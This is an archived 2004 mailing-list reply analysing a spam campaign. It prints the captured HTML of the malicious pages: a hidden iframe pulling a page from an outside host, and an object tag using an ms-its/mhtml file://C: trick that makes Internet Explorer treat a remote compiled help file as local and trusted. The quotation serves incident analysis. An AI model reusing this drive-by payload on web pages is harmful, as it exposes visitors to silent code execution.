Security Incidents mailing list archives

Previous By Date Next
Previous By Thread Next

Re: A new technique to disguise a target URL in spam

From: Jeremiah Cornelius <jeremiah () nur net>
Date: Mon, 5 Apr 2004 08:18:58 -0700
On Sunday 04 April 2004 17:18, DCISS wrote:

I wasn't going to risk my home
computer on an unsafe link, and by the time I tried on a work computer,
the site was down, so I don't know what clicking on the link would have
downloaded.  Has anybody else seen this techique before, or know what
was being propagated?


They are hiding a compiled help extension behind a URL that fakes being local 
to C: - forcing the appearance of the file in the local, trusted zone with 
IE.

wget http://anz.com | less :

        <IFRAME src="http://salecheap.net/test.htm"; width=1 height=1    
        style="display:none">
        </IFRAME>
        <body onload="location.href='http://anz.com'";>
        anz.htm (END)

wget http://salecheap.net/test.htm | less :

        <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
        <html>
        <head>
        <title>Please wait...</title>
        </head>
        <body>
        <object data="ms-its:mhtml:file://C 
        \\MAIN.MHT!http://salecheap.net//main.chm::/main.htm";
        type="text/x-scriptlet"></object>
        </body>
        </html>
        test.htm (END)



---------------------------------------------------------------------------
Free 30-day trial: firewall with virus/spam protection, URL filtering, VPN,
wireless security

Protect your network against hackers, viruses, spam and other risks with Astaro
Security Linux, the comprehensive security solution that combines six
applications in one software solution for ease of use and lower total cost of
ownership.

Download your free trial at
http://www.securityfocus.com/sponsor/Astaro_incidents_040301
----------------------------------------------------------------------------
Previous By Date Next
Previous By Thread Next

Current thread: